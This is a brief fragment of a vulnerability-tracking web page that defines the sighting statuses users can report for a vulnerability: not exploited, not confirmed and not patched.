- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…